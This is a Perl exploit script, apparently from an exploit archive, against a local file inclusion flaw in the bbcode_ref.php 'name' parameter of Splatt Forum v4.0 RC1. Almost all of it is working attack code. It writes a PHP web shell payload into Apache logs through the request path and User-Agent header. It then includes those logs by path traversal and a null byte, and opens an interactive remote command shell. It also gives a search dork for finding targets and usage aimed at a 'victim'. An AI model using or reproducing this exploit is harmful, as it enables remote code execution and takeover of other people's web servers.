phpnukesplat-lfi.txt

`#!/usr/bin/perl  
# Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit  
# D.Script: http://sourceforge.net/projects/splattforum/  
# V.Code  
# $module_name = $name; <<<-------- Line : 17  
#  
# include("modules/".$module_name."/functions.php"); <<<-------- Line : 19  
# Dork: "Splatt Forum"  
# Discovered & Coded by : GolD_M = [Mahmood_ali]  
# Contact:[email protected]  
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group  
use IO::Socket;  
use LWP::Simple;  
@apache=(  
"../../../../../var/log/httpd/access_log",  
"../../../../../var/log/httpd/error_log",  
"../apache/logs/error.log",  
"../apache/logs/access.log",  
"../../apache/logs/error.log",  
"../../apache/logs/access.log",  
"../../../apache/logs/error.log",  
"../../../apache/logs/access.log",  
"../../../../apache/logs/error.log",  
"../../../../apache/logs/access.log",  
"../../../../../apache/logs/error.log",  
"../../../../../apache/logs/access.log",  
"../logs/error.log",  
"../logs/access.log",  
"../../logs/error.log",  
"../../logs/access.log",  
"../../../logs/error.log",  
"../../../logs/access.log",  
"../../../../logs/error.log",  
"../../../../logs/access.log",  
"../../../../../logs/error.log",  
"../../../../../logs/access.log",  
"../../../../../etc/httpd/logs/access_log",  
"../../../../../etc/httpd/logs/access.log",  
"../../../../../etc/httpd/logs/error_log",  
"../../../../../etc/httpd/logs/error.log",  
"../../.. /../../var/www/logs/access_log",  
"../../../../../var/www/logs/access.log",  
"../../../../../usr/local/apache/logs/access_log",  
"../../../../../usr/local/apache/logs/access.log",  
"../../../../../var/log/apache/access_log",  
"../../../../../var/log/apache/access.log",  
"../../../../../var/log/access_log",  
"../../../../../var/www/logs/error_log",  
"../../../../../var/www/logs/error.log",  
"../../../../../usr/local/apache/logs/error_log",  
"../../../../../usr/local/apache/logs/error.log",  
"../../../../../var/log/apache/error_log",  
"../../../../../var/log/apache/error.log",  
"../../../../../var/log/access_log",  
"../../../../../var/log/error_log"  
);  
if (@ARGV < 3){  
print "  
##############################################################################  
Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit  
Usage: Gold.pl [VicTim] /modules/Forum/ [apachepath]  
Example: GolD.pl victim.com /modules/Forum/ ../logs/error.log  
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group  
Discovered & Coded by : GolD_M = [Mahmood_ali]  
##############################################################################  
";  
exit();  
}  
  
$host=$ARGV[0];  
$path=$ARGV[1];  
$apachepath=$ARGV[2];  
  
print "Injecting code in log files...\n";  
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";  
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";  
print $socket "User-Agent: ".$CODE."\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Connection: close\r\n\r\n";  
close($socket);  
print "Write END to exit!\n";  
print "IF not working try another apache path\n\n";  
  
print "[shell] ";$cmd = <STDIN>;  
  
while($cmd !~ "END") {  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";  
print $socket "GET ".$path."bbcode_ref.php?name=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\n";  
  
while ($raspuns = <$socket>)  
{  
print $raspuns;  
}  
  
print "[shell] ";  
$cmd = <STDIN>;  
}  
`